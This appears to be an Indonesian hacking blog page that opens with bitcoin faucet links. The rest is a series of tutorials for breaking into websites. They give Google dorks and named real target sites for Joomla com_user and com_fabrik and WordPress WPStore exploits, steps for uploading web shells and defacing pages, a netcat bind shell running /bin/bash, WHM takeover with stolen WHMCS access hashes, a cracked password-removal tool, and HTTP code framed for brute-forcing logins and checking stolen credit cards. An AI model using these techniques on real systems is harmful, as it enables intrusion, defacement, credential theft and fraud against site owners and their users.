Free CoinsDapatkan Bitcoins gratis setiap 24 jamVisit
BTC FlowDapatkan Bitcoins gratis setiap 24 jamVisit
CaptchaCoinKetik captcha untuk mendapatkan bitcoin gratis tanpa ada batasan waktuVisit
Land Of Bitcoin Register dahulu kemudian login untuk memulai menambang bitcoin tanpa bantuan software apapun (bitcoin anda akan bertambah sendiri setiap 30 detik)Visit
Free Bitcoin Register dahulu kemudian login dan dapatkan bitcoin gratis setiap 1 jamVisit
Daily free bitcoin Dapatkan bitcoin gratis setiap 1 jamVisit
Mmoclub Dapatkan bitcoin gratis setiap 1 jamVisit
Btcclicks Register dahulu dan lihat iklan untuk mendapatkan bitcoin gratisVisit
Redcoins Dapatkan bitcoin gratis setiap 1 jamVisit
Coinreaper Kumpulan beberapa faucet bitcoinVisit
Klik link dari tabel diatas untuk mendapatkan bitcoin gratis setiap hari. Tabel diatas akan saya update jika ada web lain yang membagikan bitcoin secara gratis.
Selamat berburu bitcoin.

Cara Deface Dengan Teknik Exploit Joomla = Com_User

Assalamualaikum....

pasti pada ga sabar kan udah nunggu dari kemaren ? wkwkwk langsung dah kita ke KTP :P

oke Download dlu html nya :
Download

Langkah 
1. Cari web target di Google dengan memasukkan Dork berikut .

intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com
#Dork Bisa di kembangin sendiri :P

2. lalu pilih target sobat , kalo sudah dapat web targetnya langsung tmbhkan target sobat dengan /administrator/
Perhatikan tulisan Joomla!® is free software released under the GNU General Public License
Dengan kotak tidak jauh .

contoh : http://www.eco-ramonage.com/administrator/index.php

.lalu masukan exploit berikut.

index.php?option=com_users&view=registration

ane ambil contoh disni :
http://www.eco-ramonage.com

3. kemudian ane ganti menjadi :
http://www.eco-ramonage.com/index.php?op...gistration

4. lalu Ctrl + u , trus cari hidden dan register dengan ctrl f ( hidden ) dan ( register )

5.jalankan file html yang tadi di download … ( password sengaja saya tidak samakan) jangan dirubah passwordnya ..
klik register

6. nntinya akan masuk di web asli.. disini masukan pass yang sama , email bleh di rubah .. klik register .
jika muncul pesan seperti ini

Your account has been created and an activation link has been sent to the email address you entered. Note that you must activate the account by clicking on the activation link when you get the email before you can login.

7. Cek email .. trus klik kanan ( open link in new tab )
jika sudah ????? masuk k bagian administrator tadi
http://www.site.com/administrator

8.login pake user pass yang tadi di daftar.

trus cara upload backdoor
. klik template manager
. Klik templates
. Klu udah di dalam templates Baru klik atomic…
. Klik edit main page templates
. Copy paste backdoor punya sobat ke dalam sini baru klik save

9. jika ada tulisan File successfully saved berarti jadi !!!
untuk masuk k backdoor ..
http://www.site.com/templates/atomic/index.php

klik public html , baru upload script deface ..
DONE !!!! web berhasil di hack =))

Nb :Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba! :P:P:P

Hack Web With WPStore

Hack Web With WPStore
oke ane newbie mau share tutor cupu
buat para mastah mastah disini lewatin aja

oke kita langsung saja

dork :
inurl:ptype=store
inurl:ptype=cart

dork bisa dikembangin sendiri sesuai anda

tidak semua web bisa sukses dengan exploit ini

epxloitnya :

Quote:/wp-content/themes/framework/upload

example :

Quote:http://yourweddingdress.co.za/wp-content...rk/upload/

jika tampilan webnya berubah menjadi gini berarti kemungkinan besar web vuln

[Image: 1_zpsdb27a693.jpg]

terus tinggal upload deh shell ente
kalau belum punya shell nih gw ada shell punya IDCA
Download
Quote:username : root
password : toor

jika setelah diupload muncul kaya gini kemungkinan besar shell sudah dapat di akses

[Image: 2_zpsf63ee955.jpg]


lalau yg terakhir cari tempat shell yg sudah di upload tadi
biasanya di sini

Quote:/wp-content/uploads/products_img/[nama shell anda].php

oke sekian tutor cupu dari saya untuk kurang lebihnya mohon maaf
dan kalau REPOST ya hapus aja bang admin yg ganteng Ganteng

salam saya UZUMADY GantengGanteng

deface dengan com_fabrik .

Untuk para master, dedengkot, mbahnya hacker khususnya defacer, pasti sudah tidak asing lagi Exploit com_fabrik. Namun untuk newbie seperti ane pasti masih clingak-clinguk. Maka dari itu ane mau berbagi sesuatu bagi yang belom tau :)



Oke, untuk yang belum tahu disimak ya :)

Dork :
inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)

Exploit :
index.php?option=com_fabrik&amp;c=import&amp;view=import&amp;filetype=csv&amp;tableid=1echercher


Langkah2nya :
Buka mbah google.com
Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?opti...mp;lang=de
Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index.php?opti...1echercher
[Image: 3_zps5c343d96.jpg]
maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
Upload shell ente Dan untuk melihat shell yang telah di upload, buka http://www.target.com/media/shell.php
[Image: 4_zps8cde2690.jpg]
seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
[Image: 5_zpsfe8fbe56.jpg]
dan taraaaaaaaa berhasil :)


Mudah banget kan??? :)
Oke, selamat berburu....
[/b]

Membuat Backdor di linux



 1) siapkan 2 buah laptop sebagai percobaannya

2)Pada kedua komputer tersebut lakukan instalasi paket netcat

Code:
apt-get install netcat

3) Pada komputer target (server) buat backdoor dengan netcat
Code:
nc –l –p 5050 –e /bin/bash

catatan :-l : listen, siap menerima koneksi-p : pada port berapa koneksi diterima-e : jalankan perintah terminal yaitu /bin/bashSetelah itu cek dengan perintah nmap untuk melihat bahwa port 5050 dalam keadaan terbuka di sisi server.
Code:
# nmap localhost

4)Pada komputer penyerang, lakukan akses terhadap port diatas, kemudian buat account pada komputer server
Code:
# nc 192.168.50.10 5050debianGUI:~# nc 10.252.42.132 5050adduser datahack => buat user datahack disisi serverAdding user `datahack' ...Adding new group `datahack' (1002) ...Adding new user `datahack' (1002) with group `datahack' ...Creating home directory `/home/datahack' ...Copying files from `/etc/skel' ...datahack => buat password : datahackdatahack => retype passwordChanging the user information for datahackEnter the new value, or press ENTER for the defaultFull Name []:Room Number []:Work Phone []:Home Phone []:Other []:yIs the information correct? [Y/n] y^C

5) Dari account yang sudah dibuat diatas, lakukan koneksi dengan telnet ke sisi server, sehingga anda sudah berhasil masuk ke sisi server.
Code:
# telnet 192.168.50.10

Download RAR Password Unlocker 4.2.0 Full Crack

Kesempatan kali ini kita akan membahas tentang cara membuka file WinRar yang telah di password. Mungkin artikel ini bermanfaat bagi para netter yang mengalami permasalahan untuk mengekstrak file yang di kompres dengan Winrar, yaitu lupa password untuk membuka berkas filenya.

Untuk melakukan hal tersebut dibutuhkan sebuah Tools bantu yaitu, "WinRar.PW.Remover-hs"



Berikut cara untuk membuka File WinRar yang telah di Password :

1. Instal Aplikasi tersebut ke dalam sistem komputer anda.

2. Jalankan Aplikasi dimaksud.

3. Klik tombol Open "RAR File"

4. Pilih Metode untuk membuka Password File Rar-nya, misalnya : "Brute-Force Attack"

5. Klik tombol Start, tunggu sejenak hingga muncul PopUp hasilnya.

Untuk mendapatkan tools-nya silahkan Download di sini
note: tanda * / %2A di link diatas dihilangkan buat bisa ngedownload gan

semoga bermanfaat gan

Hack Web Host Manager (WHM)



Assalammualaikum…

Hallo sobat, lama nih ga buat tutor lagi :D rada2 males mah saya sekarang mo hacking2an.. hehehe :D  oke sekarang saya mo bahas mengenai cara Hack Web Host Manager (WHM) :p

Apa itu Web Host Manager (WHM) ? >>>> Google aja yah :p

Sebelum itu sobat harus bisa nanem Shell dolo, klo belum bisa gimana coba? lol :D Nah, Kalo hack WHM, disini kita butuh Config WHMCSnya  :3  ga semua web bisa nemu confignya :D nasip2an aja lol :D sebenarnya bisa juga dengan cara mengexploitasi bug pada whmcs, itu sobat pelajari ndiri yah :p  utk config killernya bisa gunain Shell idca, Garuda, hiddenymouz atau sobat bisa baca artikel kita sebelumnya Cara mencari config dalam website

Perhatian!
Tutorial ini dibuat sebagai pengetahuan dan pembelajaran saja, segala tindakan penyalahgunaan pada tutorial ini seperti pelanggaran hukum, pencurian dan pengerusakan, saya tidak bertanggung jawab! Use at your own risk! 

Pesan Onix AQua:
Gunakan ilmu dengan sebaik2nya, karena 1 kebaikan yg kalian buat, maka 1000 kebaikan yang akan kalian dapatkan. dan juga sebaliknya, jika 1 keburukan yang kalian lakukan, maka 1000 keburukan akan selalu kalian dapatkan selama hidup!

Berikut bahan2 yg sobat butuhkan:

  1. Web Shelled 
  2. Whmcs killer 
  3. Config whmcs

Disini saya udah nemu config WHMnya :


 isi dalamnya seperti :



Kemudian kita buka whmcs killer yang sudah di upload ke dalam web. lalu klik Submit!



Nah, kita sudah masuk tuh, :D silahkan liat2 yoo :p


Akun WHMnya ada di H0st R00t, dan akun CPanelnya ada di Client Hosting Account


 Tinggal login aja, :p buka IP:Port dan untuk loggin ke WHM digunakn port 2086/2087

cth: 176.32.342.223:2086



udah pada bisa kan?  kalo ga bisa juga face factor pastinya :p nah, bagaimana kalo ga bisa loggin pake akun yang udah kita dapat? :o itu artinya password telah diubah oleh administratornya. kalo sobat menemukan kasus seperti ini, sobat bisa gunakan cara berikut:

Pertama sobat install dolo Addons firefox yang namanya Modify Header, klik aja disini



kemudian sobat liat di whmcs killer tadi pada kolom Access Hash.

Silahkan disusun sejajar dengan format : WHM username:AccessHash lihat gambar!



kemudian buka Modify Header, klik Select Action pilih Add. isi seperti berikut:

Header Name : Authorization
Header Value : WHM username:AccessHash



 Lalu save, dan klik Enable, kalo udah ada tanda hijau lalu klik Start


Setelah itu tinggal sobat buka WHMnya.. IP:Port



Mudah kan? :D semoga saja tutorial ini bermanfaat dan tidak disalahgunakan :) kalo disalahgunakan resiko dan Dosanya tanggung sendiri yah? :p Spesial big thanks to : Mauritania Attacker :* saya dapet ilmu dari blognya :3 dan sekian tutorial dari saya yah,  maaf kalo masih semerawut :D  

CREDIT : ONYQ AQUA

JAVA HOW TO SEND HTTP POST/GET REQUEST

Halo,lama ga temu ama akuh Ngakak
sibuk ngegame :v
oke ini aku pengen kita diskusi tengan HTTP POST/REQUEST di programming java
jadi pastiin kalo kamu udah ngerti tentang HTTP POST/REQUEST

biasanyakan kalo kita buka website atau masukin login info make browser
nah ada kalanya kita pengen auto submit login info atau data kita ke server
contohnya pengen bikin brute password,bikin akun suatu website secara massal,atau kalo udah naek dikit,kita bisa bikin auto cek credit card[if you know what

i mean Ngakak ]

semua semua itu butuh HTTP POST/GET REQUEST,karna itu yuk kita liat2 gmn java mengirim HTTP POST/GET data.

aku make library HttpClient 4.2.5 downloadnya di sinih http://hc.apache.org/downloads.cgi

"oke konsepnya gini,kita punya link yang ingin kita buka sambil mengirim data"

kita bikin di localhost dengan nama test.php


PHP Code:
<?php
$nama 
$_POST['nama']; // mengambil variable nama yang di kirim melalui http postif ($nama =="")
  {
    echo 
"Hallo " .$nama;
   }
else
 {
    echo 
"client tidak mengirim variable nama";
 }
?>
oke udah jelaskan,berarti link itu mengambil variable nama,berarti kita mengirim variable nama menggunakan java

pastikan library HttpClient di project java kamu.

ini contoh basic pengiriman post http menggunakan java
ini contoh basic pengiriman post http menggunakan java
Code:
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
package hn_httprequest;

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.ArrayList;
import java.util.List;
import org.apache.http.Consts;
import org.apache.http.HttpEntity;
import org.apache.http.HttpResponse;
import org.apache.http.NameValuePair;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.message.BasicNameValuePair;

/**
*
* @author xb
*/
public class Main {

    /**
     * @param args the command line arguments
     */
    public static void main(String[] args) {

        try {
            //ini alamat host/file yang kita minta/buka
            String link = "http://localhost/test.php";
            //deklarasikan http clientnya
            DefaultHttpClient httpclient = new DefaultHttpClient();
            //deklarasikan http responsennya
            HttpResponse response;
            //deklarasikan http postnya,ini untuk handle pengiriman requestnya
            HttpPost httpost = new HttpPost(link);
            //bikin array untuk tempat pengisian data yang mau di kirim
            List<NameValuePair> data_post = new ArrayList<NameValuePair>();
            //lalu masukan value post yang mau di kirim,pada kalo ini kita masukin variable nama dengan value dika_xb
            data_post.add(new BasicNameValuePair("nama", "DIKA_XB"));
            //masukan array yang berisi data yang mau di kirim ke httpost
            httpost.setEntity(new UrlEncodedFormEntity(data_post, Consts.UTF_8));
            //kirimkan data,lalu ambil respon dari server dengan httpresponse
            response = httpclient.execute(httpost);
            //ini deklarasi untuk mendapatin elemen elemen data yang udah kita ambil di httpresponse
            HttpEntity entity = response.getEntity();
            //oke kita coba untuk menampilkan respon server/halamannya
            StringBuilder sb = new StringBuilder();
            BufferedReader rd = new BufferedReader(new InputStreamReader(response.getEntity().getContent()));

            int linex;
            while ((linex = rd.read()) != -1) {
                sb.append((char) linex);
            }

            //kita tampilkan status respon server,apakah dia 404 atau yg lain
            System.out.println("respon : " + response.getStatusLine());

            //kita tampilkan html responsenya
            System.out.println(sb.toString());
        } catch (Exception e) {
            System.out.println("error " + e);
        }
    }
}


result
run:
respon : HTTP/1.1 200 OK
Hallo DIKA_XB
BUILD SUCCESSFUL (total time: 0 seconds)

[Image: 1240199_4679724971405_1987862796_n.jpg]

nah terus gmn cara tau website itu minta variable apa aja ?
gunakan tamper data saat post data,jadi kita bis lihat server minta variable apa saja
Ngakak
httpclient jg support cookie,jadi kita bisa seperti browser biasa.
monggo aku jg masih belajar,diskusi bareng bareng
 
Loading...

WE ARE SUPORT TO